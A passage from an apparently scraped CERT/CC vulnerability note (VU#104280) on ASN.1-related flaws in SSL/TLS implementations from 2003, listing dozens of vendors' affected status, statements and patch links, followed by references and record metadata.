vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Stunnel __ Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nStunnel requires the OpenSSL libraries for compilation (POSIX) or OpenSSL DLLs for runtime operation (Windows). While Stunnel itself is not vulnerable, it's dependence on OpenSSL means that your installation likely is vulnerable.\n\nIf you compile from source, you need to install a non-vulnerable version of OpenSSL and recompile Stunnel. \n \nIf you use the compiled Windows DLLs from stunnel.org, you should download new versions which are not vulnerable. OpenSSL 0.9.7c DLLs are available at <http://www.stunnel.org/download/stunnel/win32/openssl-0.9.7c/> \n \nNo new version of Stunnel source or executable will be made available, because the problems are inside OpenSSL -- Stunnel itself does not have the vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### SuSE Inc. __ Affected\n\nNotified: September 30, 2003 Updated: October 02, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAll SuSE products are affected. Update packages are being tested and will be published on Wednesday, October 1st. [SuSE-SA:2003:043]\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Sun Microsystems Inc. __ Affected\n\nNotified: September 30, 2003 Updated: October 24, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSun is currently investigating Solaris 7, 8, and 9 to determine the full potential impact of these SSL/TLS vulnerabilities.\n\nThe Solaris Secure Shell daemon, sshd(1M), shipped with Solaris 9, is not affected by these vulnerabilities. \n \nJava Secure Sockets Extension 1.0.x and J2SE 1.4.x are also not affected. \n \nSun Linux and Sun Cobalt both ship vulnerable versions of OpenSSL, a Sun Alert has been published here: \n \n<http://sunsolve.Sun.COM/pub-cgi/retrieve.pl?doc=fsalert/57100>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Tawie Server Linux __ Affected\n\nUpdated: October 02, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [TSL-2003-0001](<http://www.tawie.org/errata/misc/tawie-2003/TSL-2003-0001-openssl.asc.txt>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### TurboLinux __ Affected\n\nNotified: September 30, 2003 Updated: October 02, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPleas see [TLSA-2003-22](<http://www.turbolinux.com/security/TLSA-2003-22.txt>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Wirex __ Affected\n\nNotified: September 30, 2003 Updated: October 02, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [IMNX-2003-7+-022-01](<http://download.immunix.org/ImmunixOS/7+/Updates/errata/IMNX-2003-7+-022-01>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Clavister __ Not Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nClavister Firewall: Not vulnerable \n\n\nAs of version 8.3, Clavister Firewall implements an optional HTTP/S server for purposes of user authentication. However, since this implementation does not support client certificates and has no ASN.1 parser code, there can be no ASN.1-related vulnerabilities as far as SSL is concerned. \n \nEarlier versions of Clavister Firewall do not implement any SSL services.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Fujitsu __ Not Affected\n\nNotified: September 30, 2003 Updated: October 08, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nFujitsu's UXP/V o.s. is not affected by the problem in VU#255484 and 104280 because it does not support the SSL/TLS.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nSubject: VU#104280\n\nsent on October 1, 2003 \n \n[Server Products] \n\n\n * EWS/UP 48 Series operating system\n\\- is NOT vulnerable. \nIt doesn't include SSL/TLS implementation. \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### OpenSSH Not Affected\n\nNotified: September 30, 2003 Updated: October 22, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Pragma Systems __ Not Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nPragma Systems SecureShell server is not impacted by these vulnerabilites, because we do not implement SSL or TLS protocols.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Riverstone Networks __ Not Affected\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nRiverstone is not vulnerable to this.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### VanDyke Software Inc. __ Not Affected\n\nUpdated: October 08, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nVanDyke Software products are not subject to any of the vulnerabilities presented in this advisory due to the fact that VanDyke products do not use SSL/TLS in any form.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### cryptlib __ Not Affected\n\nNotified: September 30, 2003 Updated: October 22, 2003 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\ncryptlib does not appear to be vulnerable to the malformed ASN.1 data, either with or without the use of its internal ASN.1 firewall.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### 3Com Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### AT&amp;T Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Alcatel Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Apache Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Apache-SSL Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Avaya Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Bitvise Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Borderware Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Computer Associates Unknown\n\nNotified: September 30, 2003 Updated: October 08, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Covalent Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Crypto++ Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Data General Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Entrust Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Extreme Networks Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Foundry Networks Inc. Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### GNU Libgcrypt Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### GNU Privacy Guard Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### GNU TLS Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Global Technology Associates Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### IAIK Unknown\n\nNotified: October 24, 2003 Updated: October 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Intel Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Intoto Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Linksys Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Lotus Software Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Lucent Technologies Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Microsoft Corporation Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### MontaVista Software Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Neoteris Unknown\n\nNotified: October 27, 2003 Updated: October 27, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### NetScreen Technologies Inc. Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Netscape (AOL) NSS Unknown\n\nNotified: November 05, 2003 Updated: November 13, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Network Appliance Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Nokia Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### OpenSSL __ Unknown\n\nNotified: September 30, 2003 Updated: October 22, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see &lt;<http://www.openssl.org/news/secadv_20030930.txt>&gt;. Note that VU#104280 broadly covers ASN.1 related vulnerabilities in SSL/TLS implementations other than OpenSSL. VU#255484, VU#732952, VU#380864, VU#686224, and VU#935264 are specific to OpenSSL.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Openwall GNU/*/Linux __ Unknown\n\nNotified: September 30, 2003 Updated: October 01, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nOpenwall GNU/*/Linux currently uses OpenSSL 0.9.6 branch and thus was affected by the ASN.1 parsing and client certificate handling vulnerabilities pertaining to those versions of OpenSSL. It was not affected by the potentially more serious incorrect memory deallocation vulnerability (VU#935264, CVE CAN-2003-0545) that is specific to OpenSSL 0.9.7.\n\nOwl-current as of 2003/10/01 has been updated to OpenSSL 0.9.6k, thus correcting the vulnerabilities.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Oracle Corporation __ Unknown\n\nNotified: September 30, 2003 Updated: October 02, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nFrom [NISCC/006489/OpenSSL](<http://www.uniras.gov.uk/vuls/2003/006489/openssl.htm>) and [NISCC/006489/TLS](<http://www.uniras.gov.uk/vuls/2003/006489/tls.htm>):\n\nOracle Corporation is aware of this vulnerability, and we are investigating.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Sequent Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Sony Corporation Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Symantec Corporation Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Unisys Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### WatchGuard Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### lsh Unknown\n\nNotified: September 30, 2003 Updated: October 08, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\n### mod_ssl Unknown\n\nNotified: September 30, 2003 Updated: September 30, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23104280 Feedback>).\n\nView all 86 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 0 | AV:--/AC:--/Au:--/C:--/I:--/A:-- \nTemporal | 0 | E:Not Defined (ND)/RL:Not Defined (ND)/RC:Not Defined (ND) \nEnvironmental | 0 | CDP:Not Defined (ND)/TD:Not Defined (ND)/CR:Not Defined (ND)/IR:Not Defined (ND)/AR:Not Defined (ND) \n \n \n\n\n### References \n\n * <http://www.uniras.gov.uk/vuls/2003/006489/tls.htm>\n * <http://wp.netscape.com/eng/ssl3/>\n * <http://www.ietf.org/rfc/rfc2246.txt>\n * <http://www.itu.int/ITU-T/studygroups/com10/languages/>\n * <http://www.rsasecurity.com/rsalabs/pkcs/>\n\n### Acknowledgements\n\nThis vulnerability was discovered and researched by NISCC.\n\nThis document was written by Art Manion.\n\n### Other Information\n\n**CVE IDs:** | [None](<http://web.nvd.nist.gov/vuln/detail/None>) \n---|--- \n**CERT Advisory:** | [CA-2003-26 ](<http://www.cert.org/advisories/CA-2003-26.html>) \n**Severity Metric:** | 11.81 \n**Date Public:** | 2003-09-30 \n**Date First Published:** | 2003-09-30 \n**Date Last Updated: ** | 2004-08-25 17:54 UTC \n**Document Revision: ** | 27 \n", "modified": "2004-08-25T17:54:00", "published": "2003-09-30T00:00:00", "id": "VU:104280", "href": "https://www.kb.cert.org/vuls/id/104280", "type": "cert", "title": "Multiple vulnerabilities in SSL/TLS implementations", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:44:07", "bulletinFamily": "info", "cvelist": ["CVE-2003-0544"], "description": "### Overview \n\nA 